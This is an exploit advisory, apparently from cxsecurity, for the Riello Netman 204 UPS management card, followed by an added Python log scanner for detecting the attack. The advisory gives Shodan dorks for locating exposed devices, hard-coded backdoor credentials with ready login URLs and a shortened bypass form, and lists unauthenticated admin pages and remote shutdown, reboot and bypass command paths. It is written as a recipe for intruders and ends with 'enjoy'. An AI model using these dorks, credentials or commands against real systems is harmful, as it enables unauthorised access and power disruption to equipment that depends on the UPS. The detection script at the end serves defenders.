Netman 204 - Broken Access Control Remote command

2025.01.28
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Netman 204 - Broken Access Control Remote command
# Date: 1/28/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux

Step 1 : An attacker can use these dorks to find the UPS panel.

Shodan : http.favicon.hash:22913038
OR
https://www.shodan.io/search?query=netman+204+cgi-bin

# We found two panels: Yellow and Blue

Step 2 : For the Yellow panel, an attacker can use the username and password below because the device has a backdoor. For the Blue panel, we can use the remote commands and the Burp Suite Repeater to see the details of the UPS.

Yellow Panel :

username and password : eurek

Some exploits for that :

http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek

Due to flaws in parameter validation, the URL can be shortened to:

http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek

Blue Panel :

username and password : admin

Some critical leaks we can see without authentication :

http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html

# Using the paths above, we can see the details of the UPS without authentication.

First open Burp Suite and intercept the requests, then request the paths above. Send that request to the Repeater, send it again, and open the Render view of the response and enjoy :)

Some remote commands without authentication :

http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery
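
For defenders, the request patterns listed above can be searched for in web logs. The following is an added example, not part of the original advisory or any vendor tooling: it assumes the card sits behind a reverse proxy or gateway that writes Common/Combined Log Format, and the function names, sample log lines and management-host allowlist are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

BACKDOOR_USER = "eurek"  # Yellow panel account named in the advisory
# Pages the advisory lists as readable without authentication
# (index.html and login.html are left out as ordinary landing pages; assumption).
ADMIN_PAGES = {"/administration-commands.html", "/administration.html",
               "/configuration.html", "/history.html",
               "/system-overview.html", "/table.html"}
# Assumption: Common/Combined Log Format from a proxy in front of the card.
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify(line, mgmt_hosts=frozenset()):
    """Return (source, reason) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    if path == "/cgi-bin/login.cgi":
        # parse_qs decodes %20, so the shortened "eurek%20eurek" form
        # becomes "eurek eurek" and is caught by the same token check.
        users = parse_qs(url.query).get("username", [])
        if any(BACKDOOR_USER in u.lower().split() for u in users):
            return (m["src"], "backdoor-login")
    # URL fragments (#shutdown, #reboot-mdu, ...) are never sent to the
    # server, so only the page path is available to match on.
    if path in ADMIN_PAGES and m["status"] == "200" and m["src"] not in mgmt_hosts:
        return (m["src"], "admin-page-from-unmanaged-host")
    return None

def scan(lines, mgmt_hosts=frozenset()):
    """Classify every log line and keep only the findings."""
    return [hit for hit in (classify(l, mgmt_hosts) for l in lines) if hit]

# Constructed sample log lines (documentation address ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Jan/2025:10:00:01 +0000] "GET /cgi-bin/login.cgi?username=eurek&password=eurek HTTP/1.1" 200 512',
    '203.0.113.7 - - [28/Jan/2025:10:00:05 +0000] "GET /cgi-bin/login.cgi?username=eurek%20eurek HTTP/1.1" 200 512',
    '198.51.100.9 - - [28/Jan/2025:10:02:00 +0000] "GET /administration-commands.html HTTP/1.1" 200 9001',
    '192.0.2.10 - - [28/Jan/2025:10:03:00 +0000] "GET /administration.html HTTP/1.1" 200 7000',
    '198.51.100.9 - - [28/Jan/2025:10:04:00 +0000] "GET /index.html HTTP/1.1" 200 1200',
]

if __name__ == "__main__":
    for src, reason in scan(SAMPLE_LOG, mgmt_hosts={"192.0.2.10"}):
        print(src, reason)
```

Because the `#shutdown`, `#reboot-mdu` and similar fragments stay in the browser, a log cannot show which command view was opened; any hit on `administration-commands.html` from outside the management network has to be treated as the signal.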



Copyright 2025, cxsecurity.com

 
